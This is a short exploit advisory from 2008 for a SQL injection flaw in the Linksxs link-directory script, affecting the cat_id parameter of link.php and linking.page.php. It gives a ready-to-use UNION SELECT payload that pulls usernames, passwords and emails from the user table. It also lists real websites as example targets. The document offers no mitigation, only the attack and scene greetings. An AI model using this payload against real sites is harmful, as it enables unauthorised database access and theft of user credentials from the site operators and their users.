Linksxs Script suffers from a remote SQL injection vulnerability.
2c801ae9badf9e6c7c0d8a05198dafbd554fc4a4697e6af4752833125902e3ae
[~]-----------------------------------------------------------------------------------------------------------------------------------------------------
[~]
[~] Linksxs Script (link.php?cat_id) and (linking.page.php?cat_id) Remote
SQL Injection Vulnerability
[~]
[~] https://linksxs.com
[~]
[~]
[~]
----------------------------------------------------------------------------------------------------------------------------------------------------
[~] Bug founded by d3v1l [Avram Marius]
[~]
[~] Date: 19.11.2008
[~]
[~]
[~] d3v1l@spoofer.com https://security-sh3ll.com
[~]
[~]
----------------------------------------------------------------------------------------------------------------------------------------------------
[~] Greetz tO ALL:-
[~]
[~] Security-Shell Members ( https://security-sh3ll.com/forum.php )
[~]
[~] packetstorm staff
[~]-----------------------------------------------------------------------------------------------------------------------------------------------------
[~] Exploit :-
[~]
[~] https://site.com/link.php?cat_id=-1 union select
1,2,3,4,5,6,concat(fname,0x3a,password,0x3a,email),8,9,10,11,12,13,14,15,16,17,18
from lp_user_tb/*
[~]
[~]
[~]------------------------------------------------------------------------------------------------------------------------------------------------------
[~]
[~] Example :-
[~]
[~] linking.page.php?cat_id= ->
https://www.linksxs.com/linking.page.php?cat_id=SQL
[~]
[~]
[~] link.php?cat_id= ->
https://photostoslideshows.com/links/link.php?cat_id=SQL
[~]
[~]
[~]-------------------------------------------------------------------------------------------------------------------------------------------------------